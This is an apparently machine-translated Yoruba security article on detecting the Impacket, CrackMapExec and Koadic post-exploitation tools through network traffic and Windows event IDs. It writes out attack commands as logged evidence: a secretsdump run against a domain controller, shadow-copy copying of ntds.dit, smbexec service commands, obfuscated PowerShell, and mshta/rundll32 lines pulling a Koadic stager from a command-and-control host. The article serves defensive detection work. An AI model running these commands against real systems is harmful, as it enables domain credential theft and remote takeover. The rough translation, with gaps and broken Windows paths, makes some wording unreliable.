Nọmba awọn ikọlu ni eka ile-iṣẹ n dagba ni gbogbo ọdun: fun apẹẹrẹ ju ni 2016, ati ni opin 2018 - ju ninu awọn ti tẹlẹ akoko. Pẹlu awọn ibi ti irinṣẹ iṣẹ akọkọ jẹ ẹrọ ṣiṣe Windows. Ni ọdun 2017-2018, APT Dragonfly, APT28, Ti ṣe ikọlu si ijọba ati awọn ẹgbẹ ologun ni Yuroopu, Ariwa America ati Saudi Arabia. Ati pe a lo awọn irinṣẹ mẹta fun eyi - , и . Koodu orisun wọn wa ni sisi ati wa lori GitHub.
O tọ lati ṣe akiyesi pe awọn irinṣẹ wọnyi ko lo fun ilaluja akọkọ, ṣugbọn lati ṣe idagbasoke ikọlu laarin awọn amayederun. Awọn ikọlu lo wọn ni awọn ipele oriṣiriṣi ti ikọlu ni atẹle ilaluja agbegbe naa. Eyi, nipasẹ ọna, ṣoro lati ṣawari ati nigbagbogbo nikan pẹlu iranlọwọ ti imọ-ẹrọ tabi awọn irinṣẹ ti o gba laaye . Awọn irinṣẹ pese awọn iṣẹ oriṣiriṣi, lati gbigbe awọn faili si ibaraenisepo pẹlu iforukọsilẹ ati ṣiṣe awọn aṣẹ lori ẹrọ latọna jijin. A ṣe iwadii awọn irinṣẹ wọnyi lati pinnu iṣẹ ṣiṣe nẹtiwọọki wọn.
Ohun ti a nilo lati ṣe:
- Loye bi awọn irinṣẹ gige sakasaka ṣiṣẹ. Wa ohun ti awọn ikọlu nilo lati lo nilokulo ati kini awọn imọ-ẹrọ ti wọn le lo.
- Wa ohun ti a ko rii nipasẹ awọn irinṣẹ aabo alaye ni awọn ipele akọkọ ti ikọlu. A le fo alakoso atunṣe, boya nitori ẹniti o kọlu jẹ olukolu inu, tabi nitori pe olukolu naa nlo iho kan ninu awọn amayederun ti a ko mọ tẹlẹ. O ṣee ṣe lati mu pada gbogbo pq ti awọn iṣe rẹ pada, nitorinaa ifẹ lati rii gbigbe siwaju.
- Yọ awọn idaniloju eke kuro lati awọn irinṣẹ wiwa ifọle. A ko gbọdọ gbagbe pe nigbati a ba rii awọn iṣe kan lori ipilẹ atunyẹwo nikan, awọn aṣiṣe loorekoore ṣee ṣe. Nigbagbogbo ninu awọn amayederun awọn ọna ti o to, ko ṣe iyatọ si awọn ti o tọ ni iwo akọkọ, lati gba alaye eyikeyi.
Kini awọn irinṣẹ wọnyi fun awọn ikọlu? Ti eyi ba jẹ Impacket, lẹhinna awọn ikọlu gba ile-ikawe nla ti awọn modulu ti o le ṣee lo ni awọn ipele oriṣiriṣi ti ikọlu ti o tẹle lẹhin fifọ agbegbe naa. Ọpọlọpọ awọn irinṣẹ lo awọn modulu Impacket ni inu - fun apẹẹrẹ, Metasploit. O ni dcomexec ati wmiexec fun pipaṣẹ pipaṣẹ latọna jijin, asiri fun gbigba awọn akọọlẹ lati iranti ti o ṣafikun lati Impacket. Bi abajade, wiwa deede ti iṣẹ ṣiṣe ti iru ile-ikawe kan yoo rii daju wiwa awọn itọsẹ.
Kii ṣe lasan pe awọn olupilẹṣẹ kowe “Agbara nipasẹ Impacket” nipa CrackMapExec (tabi CME larọwọto). Ni afikun, CME ni iṣẹ ṣiṣe ti a ṣe fun awọn oju iṣẹlẹ olokiki: Mimikatz fun gbigba awọn ọrọ igbaniwọle tabi hashes wọn, imuse ti Meterpreter tabi aṣoju ijọba fun ipaniyan latọna jijin, ati Bloodhound lori ọkọ.
Ọpa kẹta ti a yan ni Koadic. O jẹ laipe laipe, o ti gbekalẹ ni apejọ agbonaeburuwole agbaye DEFCON 25 ni ọdun 2017 ati pe o jẹ iyatọ nipasẹ ọna ti kii ṣe deede: o ṣiṣẹ nipasẹ HTTP, Java Script ati Microsoft Visual Basic Script (VBS). Ọna yii ni a pe ni gbigbe kuro ni ilẹ: ọpa naa nlo eto awọn igbẹkẹle ati awọn ile-ikawe ti a ṣe sinu Windows. Awọn olupilẹṣẹ pe COM Command & Iṣakoso, tabi C3.
IMPACKET
Impacket ká iṣẹ jẹ gidigidi jakejado, orisirisi lati reconnaissance inu AD ati ki o gba data lati abẹnu MS SQL apèsè, to imuposi fun gbigba awọn iwe eri: yi jẹ ẹya SMB relay kolu, ati gbigba ntds.dit faili ti o ni awọn hashes ti olumulo awọn ọrọigbaniwọle lati kan domain oludari. Impacket tun ṣiṣẹ awọn aṣẹ latọna jijin nipa lilo awọn ọna oriṣiriṣi mẹrin: WMI, Iṣẹ Isakoso Iṣeto Windows, DCOM, ati SMB, ati pe o nilo awọn iwe-ẹri lati ṣe bẹ.
Asiri
Jẹ ká ya a wo ni secretsdump. Eyi jẹ module ti o le dojukọ awọn ẹrọ olumulo mejeeji ati awọn oludari agbegbe. O le ṣee lo lati gba awọn ẹda ti awọn agbegbe iranti LSA, SAM, SECURITY, NTDS.dit, nitorinaa o le rii ni awọn ipele oriṣiriṣi ti ikọlu naa. Igbesẹ akọkọ ninu iṣiṣẹ module jẹ ijẹrisi nipasẹ SMB, eyiti o nilo boya ọrọ igbaniwọle olumulo tabi hash rẹ lati gbe ikọlu Hash naa kọja laifọwọyi. Nigbamii ti ibeere kan wa lati ṣii iraye si Oluṣakoso Iṣakoso Iṣẹ (SCM) ati ni iraye si iforukọsilẹ nipasẹ ilana winreg, lilo eyiti ikọlu le wa data ti awọn ẹka anfani ati gba awọn abajade nipasẹ SMB.
Ninu Ọpọtọ. 1 a rii bii gangan nigba lilo ilana winreg, iraye si ni lilo bọtini iforukọsilẹ pẹlu LSA kan. Lati ṣe eyi, lo aṣẹ DCERPC pẹlu opcode 15 - OpenKey.
Iresi. 1. Ṣii bọtini iforukọsilẹ nipa lilo ilana winreg
Nigbamii ti, nigbati iraye si bọtini ba gba, awọn iye ti wa ni fipamọ pẹlu aṣẹ SaveKey pẹlu opcode 20. Impacket ṣe eyi ni ọna kan pato. O fipamọ awọn iye si faili ti orukọ rẹ jẹ okun ti awọn ohun kikọ laileto 8 ti a fikun pẹlu .tmp. Ni afikun, gbigbe siwaju sii ti faili yii waye nipasẹ SMB lati ilana System32 (Fig. 2).
Iresi. 2. Eto fun gbigba bọtini iforukọsilẹ lati ẹrọ latọna jijin
O wa ni pe iru iṣẹ bẹ lori nẹtiwọọki le ṣee wa-ri nipasẹ awọn ibeere si awọn ẹka iforukọsilẹ kan nipa lilo ilana winreg, awọn orukọ kan pato, awọn aṣẹ ati aṣẹ wọn.
Ẹya yii tun fi awọn itọpa silẹ ninu akọọlẹ iṣẹlẹ Windows, ti o jẹ ki o rọrun lati wa. Fun apẹẹrẹ, bi abajade ti ṣiṣe pipaṣẹ naa
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCNinu iwe akọọlẹ Windows Server 2016 a yoo rii lẹsẹsẹ bọtini atẹle ti awọn iṣẹlẹ:
1. 4624 - latọna Logon.
2. 5145 - ṣayẹwo awọn ẹtọ wiwọle si iṣẹ latọna jijin winreg.
3. 5145 - ṣayẹwo awọn ẹtọ wiwọle faili ni System32 liana. Faili naa ni orukọ laileto ti a mẹnuba loke.
4 - ṣiṣẹda ilana cmd.exe ti o ṣe ifilọlẹ vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - ṣiṣẹda ilana pẹlu aṣẹ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - ṣiṣẹda ilana pẹlu aṣẹ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - ṣiṣẹda ilana pẹlu aṣẹ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Bii ọpọlọpọ awọn irinṣẹ ilokulo lẹhin, Impacket ni awọn modulu fun ṣiṣe awọn pipaṣẹ latọna jijin. A yoo dojukọ smbexec, eyiti o pese ikarahun aṣẹ ibanisọrọ lori ẹrọ latọna jijin. Ẹya yii tun nilo ijẹrisi nipasẹ SMB, boya pẹlu ọrọ igbaniwọle tabi hash ọrọ igbaniwọle kan. Ninu Ọpọtọ. 3 a rii apẹẹrẹ ti bii iru irinṣẹ ṣiṣẹ, ninu ọran yii o jẹ console oludari agbegbe.
Iresi. 3. Interactive smbexec console
Igbesẹ akọkọ ti smbexec lẹhin ijẹrisi ni lati ṣii SCM pẹlu aṣẹ OpenSCManagerW (15). Ibeere naa jẹ ohun akiyesi: aaye MachineName jẹ DUMMY.
Iresi. 4. Beere lati ṣii Oluṣakoso Iṣakoso Iṣẹ
Nigbamii ti, iṣẹ naa ti ṣẹda nipa lilo aṣẹ CreateServiceW (12). Ninu awọn idi ti smbexec, a le ri kanna pipaṣẹ ikole kannaa ni gbogbo igba ti. Ninu Ọpọtọ. 5 alawọ ewe tọkasi awọn paramita aṣẹ ti ko yipada, ofeefee tọkasi kini ikọlu le yipada. O rọrun lati rii pe orukọ faili ti o le ṣiṣẹ, itọsọna rẹ ati faili ti o wujade le yipada, ṣugbọn iyokù jẹ pupọ sii nira pupọ lati yipada laisi idamu ọgbọn ti module Impacket.
Iresi. 5. Beere lati ṣẹda iṣẹ kan nipa lilo Oluṣakoso Iṣakoso Iṣẹ
Smbexec tun fi awọn itọpa ti o han gbangba silẹ ninu akọọlẹ iṣẹlẹ Windows. Ninu iwe akọọlẹ Windows Server 2016 fun ikarahun aṣẹ ibaraenisepo pẹlu aṣẹ ipconfig, a yoo rii ọkọọkan bọtini atẹle ti awọn iṣẹlẹ:
1 - fifi sori ẹrọ iṣẹ lori ẹrọ olufaragba:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2 - ṣiṣẹda ilana cmd.exe pẹlu awọn ariyanjiyan lati aaye 4688.
3. 5145 - ṣayẹwo awọn ẹtọ wiwọle si faili __jade ninu iwe ilana C $.
4. 4697 - fifi sori ẹrọ ti iṣẹ lori ẹrọ olufaragba.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5 - ṣiṣẹda ilana cmd.exe pẹlu awọn ariyanjiyan lati aaye 4688.
6. 5145 - ṣayẹwo awọn ẹtọ wiwọle si faili __jade ninu iwe ilana C $.
Impacket jẹ ipilẹ fun idagbasoke awọn irinṣẹ ikọlu. O fẹrẹ ṣe atilẹyin fun gbogbo awọn ilana ni awọn amayederun Windows ati ni akoko kanna ni awọn ẹya abuda tirẹ. Eyi ni awọn ibeere winreg kan pato, ati lilo API SCM pẹlu iṣeto aṣẹ abuda, ati ọna kika orukọ faili, ati SMB pin SYSTEM32.
CRACKMAPEXEC
Ọpa CME jẹ apẹrẹ ni akọkọ lati ṣe adaṣe awọn iṣe ṣiṣe deede ti ikọlu ni lati ṣe lati ni ilọsiwaju laarin nẹtiwọọki naa. O faye gba o lati ṣiṣẹ ni apapo pẹlu awọn daradara-mọ Empire oluranlowo ati Meterpreter. Lati ṣiṣẹ awọn aṣẹ ni ikọkọ, CME le pa wọn mọ. Lilo Bloodhound (ọpa isọdọtun lọtọ), ikọlu le ṣe adaṣe wiwa fun igba alabojuto agbegbe ti nṣiṣe lọwọ.
Bloodhound
Bloodhound, gẹgẹbi ohun elo adaduro, ngbanilaaye fun atunyẹwo ilọsiwaju laarin nẹtiwọọki. O n gba data nipa awọn olumulo, awọn ẹrọ, awọn ẹgbẹ, awọn akoko ati pe a pese bi iwe afọwọkọ PowerShell tabi faili alakomeji. LDAP tabi awọn ilana ti o da lori SMB ni a lo lati gba alaye. Module iṣọpọ CME ngbanilaaye Bloodhound lati ṣe igbasilẹ si ẹrọ olufaragba, ṣiṣẹ ati gba data ti o gba lẹhin ipaniyan, nitorinaa adaṣe awọn iṣe ninu eto ati jẹ ki wọn dinku akiyesi. Ikarahun ayaworan Bloodhound ṣafihan data ti a gba ni irisi awọn aworan, eyiti o fun ọ laaye lati wa ọna kukuru lati ẹrọ ikọlu si alabojuto agbegbe.
Iresi. 6. Bloodhound Interface
Lati ṣiṣẹ lori ẹrọ olufaragba, module ṣẹda iṣẹ-ṣiṣe nipa lilo ATSVC ati SMB. ATSVC jẹ ẹya wiwo fun ṣiṣẹ pẹlu awọn Windows-ṣiṣe Scheduler. CME nlo iṣẹ NetrJobAdd (1) rẹ lati ṣẹda awọn iṣẹ ṣiṣe lori nẹtiwọki. Apeere ti ohun ti CME module rán ti han ni Ọpọtọ. 7: Eyi jẹ ipe pipaṣẹ cmd.exe ati koodu obfuscated ni irisi awọn ariyanjiyan ni ọna kika XML.
Eya.7. Ṣiṣẹda iṣẹ-ṣiṣe nipasẹ CME
Lẹhin ti a ti fi iṣẹ naa silẹ fun ipaniyan, ẹrọ olufaragba bẹrẹ Bloodhound funrararẹ, ati pe eyi ni a le rii ninu ijabọ naa. Module naa jẹ ijuwe nipasẹ awọn ibeere LDAP lati gba awọn ẹgbẹ boṣewa, atokọ ti gbogbo awọn ero ati awọn olumulo ni agbegbe, ati gba alaye nipa awọn akoko olumulo ti nṣiṣe lọwọ nipasẹ ibeere SRVSVC NetSessEnum.
Iresi. 8. Ngba akojọ awọn akoko ti nṣiṣe lọwọ nipasẹ SMB
Ni afikun, ifilọlẹ Bloodhound lori ẹrọ olufaragba pẹlu ṣiṣiṣẹ iṣatunṣe jẹ atẹle pẹlu iṣẹlẹ kan pẹlu ID 4688 (iṣẹda ilana) ati orukọ ilana «C:WindowsSystem32cmd.exe». Ohun ti o ṣe akiyesi nipa rẹ ni awọn ariyanjiyan laini aṣẹ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Enum_avproducts module jẹ gidigidi awon lati ojuami ti wo ti iṣẹ-ati imuse. WMI gba ọ laaye lati lo ede ibeere WQL lati gba data lati oriṣiriṣi awọn nkan Windows, eyiti o jẹ pataki ohun ti module CME yii nlo. O ṣe ipilẹṣẹ awọn ibeere si AntiSpywareProduct ati awọn kilasi AntiМirusProduct nipa awọn irinṣẹ aabo ti a fi sori ẹrọ ẹrọ olufaragba naa. Lati le gba data pataki, module naa sopọ si aaye orukọ rootSecurityCenter2, lẹhinna ṣe agbekalẹ ibeere WQL kan ati gba esi kan. Ninu Ọpọtọ. Nọmba 9 fihan awọn akoonu ti iru awọn ibeere ati awọn idahun. Ninu apẹẹrẹ wa, a rii Olugbeja Windows.
Iresi. 9. Iṣẹ nẹtiwọki ti enum_avproducts module
Nigbagbogbo, iṣayẹwo WMI (Trace WMI-Activity), ninu eyiti awọn iṣẹlẹ rẹ le wa alaye to wulo nipa awọn ibeere WQL, le jẹ alaabo. Ṣugbọn ti o ba ti ṣiṣẹ, lẹhinna ti iwe afọwọkọ enum_avproducts ba ṣiṣẹ, iṣẹlẹ kan pẹlu ID 11 yoo wa ni fipamọ. Yoo ni orukọ olumulo ti o firanṣẹ ibeere naa ati orukọ ninu aaye orukọ rootSecurityCenter2.
Olukuluku awọn modulu CME ni awọn ohun-ọṣọ tirẹ, jẹ awọn ibeere WQL kan pato tabi ṣiṣẹda iru iṣẹ-ṣiṣe kan ninu oluṣeto iṣẹ-ṣiṣe pẹlu obfuscation ati iṣẹ-ṣiṣe kan pato Bloodhound ni LDAP ati SMB.
KOADIC
Ẹya pataki ti Koadic ni lilo JavaScript ati awọn onitumọ VBScript ti a ṣe sinu Windows. Ni ori yii, o tẹle igbesi aye ti aṣa ilẹ - iyẹn ni, ko ni awọn igbẹkẹle ita ati lo awọn irinṣẹ Windows boṣewa. Eyi jẹ ohun elo kan fun pipaṣẹ kikun & Iṣakoso (CnC), niwon lẹhin ikolu ti “fi sii” sori ẹrọ, ti o jẹ ki o ṣakoso. Iru ẹrọ bẹ, ni Koadic terminology, ni a npe ni "zombie". Ti awọn anfani ti ko to fun iṣiṣẹ ni kikun ni ẹgbẹ olufaragba, Koadic ni agbara lati gbe wọn dide nipa lilo awọn ilana idari Iṣakoso Akọọlẹ Olumulo (UAC fori).
Iresi. 10. Koadic ikarahun
Olufaragba gbọdọ bẹrẹ ibaraẹnisọrọ pẹlu Aṣẹ & olupin Iṣakoso. Lati ṣe eyi, o nilo lati kan si URI ti a ti pese tẹlẹ ati gba ara Koadic akọkọ nipa lilo ọkan ninu awọn ipele. Ninu Ọpọtọ. Nọmba 11 fihan apẹẹrẹ fun olutẹtẹ mshta.
Iresi. 11. Bibẹrẹ igba pẹlu olupin CnC
Da lori iyipada idahun WS, o han gbangba pe ipaniyan waye nipasẹ WScript.Shell, ati awọn oniyipada STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ni alaye pataki nipa awọn aye ti igba lọwọlọwọ. Eyi ni orisii idahun ibeere akọkọ ni asopọ HTTP pẹlu olupin CnC kan. Awọn ibeere atẹle ni o ni ibatan taara si iṣẹ ṣiṣe ti awọn modulu ti a pe (awọn aranmo). Gbogbo awọn modulu Koadic ṣiṣẹ nikan pẹlu igba ti nṣiṣe lọwọ pẹlu CnC.
Mimikatz
Gẹgẹ bi CME ti n ṣiṣẹ pẹlu Bloodhound, Koadic ṣiṣẹ pẹlu Mimikatz bi eto lọtọ ati pe o ni awọn ọna lọpọlọpọ lati ṣe ifilọlẹ. Ni isalẹ ni bata-idahun ibeere fun gbigbajade ifinumọ Mimikatz.
Iresi. 12. Gbigbe Mimikatz si Koadic
O le wo bii ọna kika URI ninu ibeere ti yipada. O ni bayi ni iye kan fun oniyipada csrf, eyiti o jẹ iduro fun module ti o yan. Máṣe fiyesi orukọ rẹ̀; Gbogbo wa mọ pe CSRF nigbagbogbo loye yatọ. Idahun naa jẹ ara akọkọ ti Koadic, eyiti koodu ti o ni ibatan si Mimikatz ti ṣafikun. O tobi pupọ, nitorinaa jẹ ki a wo awọn aaye pataki. Nibi a ni iwe-ikawe Mimikatz ti a fi koodu si ni base64, kilasi .NET serialized ti yoo fun u, ati awọn ariyanjiyan lati ṣe ifilọlẹ Mimikatz. Abajade ipaniyan ti tan kaakiri lori nẹtiwọọki ni ọrọ mimọ.
Iresi. 13. Abajade ti nṣiṣẹ Mimikatz lori ẹrọ latọna jijin
Exec_cmd
Koadic tun ni awọn modulu ti o le ṣiṣẹ awọn aṣẹ latọna jijin. Nibi a yoo rii ọna iran URI kanna ati sid faramọ ati awọn oniyipada csrf. Ninu ọran ti module exec_cmd, koodu ti wa ni afikun si ara ti o lagbara lati ṣiṣẹ awọn aṣẹ ikarahun. Ni isalẹ jẹ afihan iru koodu ti o wa ninu idahun HTTP ti olupin CnC.
Iresi. 14. afisinu koodu exec_cmd
Oniyipada GAWTUUGCFI pẹlu abuda WS ti o faramọ ni a nilo fun ipaniyan koodu. Pẹlu iranlọwọ rẹ, ifibọ naa n pe ikarahun naa, ṣiṣe awọn ẹka meji ti koodu - shell.exec pẹlu ipadabọ ṣiṣan data ti o jade ati shell.run laisi pada.
Koadic kii ṣe ohun elo aṣoju, ṣugbọn o ni awọn ohun-ọṣọ tirẹ nipasẹ eyiti o le rii ni ijabọ ẹtọ:
- idasile pataki ti awọn ibeere HTTP,
- lilo winHttpRequests API,
- ṣiṣẹda ohun WScript.Shell nipasẹ ActiveXObject,
- ti o tobi executable body.
Isopọ akọkọ ti bẹrẹ nipasẹ olutẹtẹ, nitorinaa o ṣee ṣe lati rii iṣẹ ṣiṣe nipasẹ awọn iṣẹlẹ Windows. Fun mshta, eyi jẹ iṣẹlẹ 4688, eyiti o tọka si ṣiṣẹda ilana kan pẹlu ẹya ibẹrẹ:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Lakoko ti Koadic nṣiṣẹ, o le rii awọn iṣẹlẹ 4688 miiran pẹlu awọn abuda ti o ṣe apejuwe rẹ ni pipe:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1awari
Igbesi aye ti aṣa ti ilẹ n gba olokiki laarin awọn ọdaràn. Wọn lo awọn irinṣẹ ati awọn ilana ti a ṣe sinu Windows fun awọn iwulo wọn. A n rii awọn irinṣẹ olokiki Koadic, CrackMapExec ati Impacket ti o tẹle ilana yii n han siwaju si ninu awọn ijabọ APT. Nọmba awọn orita lori GitHub fun awọn irinṣẹ wọnyi tun n dagba, ati pe awọn tuntun n han (o wa tẹlẹ nipa ẹgbẹrun ninu wọn ni bayi). Aṣa naa n gba olokiki nitori irọrun rẹ: awọn ikọlu ko nilo awọn irinṣẹ ẹnikẹta; wọn ti wa tẹlẹ lori awọn ẹrọ olufaragba ati ṣe iranlọwọ fun wọn lati fori awọn igbese aabo. A fojusi lori kikọ ibaraẹnisọrọ nẹtiwọki: ọpa kọọkan ti a ṣalaye loke fi awọn ipa ti ara rẹ silẹ ni ijabọ nẹtiwọki; iwadi alaye ti wọn gba wa laaye lati kọ ọja wa ṣawari wọn, eyiti o ṣe iranlọwọ nikẹhin lati ṣe iwadii gbogbo pq ti awọn iṣẹlẹ cyber ti o kan wọn.
onkọwe:
- Anton Tyurin, Ori ti Ẹka Awọn iṣẹ Amoye, Ile-iṣẹ Aabo Amoye PT, Awọn Imọ-ẹrọ Rere
- Egor Podmokov, iwé, Ile-iṣẹ Aabo Amoye PT, Awọn Imọ-ẹrọ Rere
orisun: www.habr.com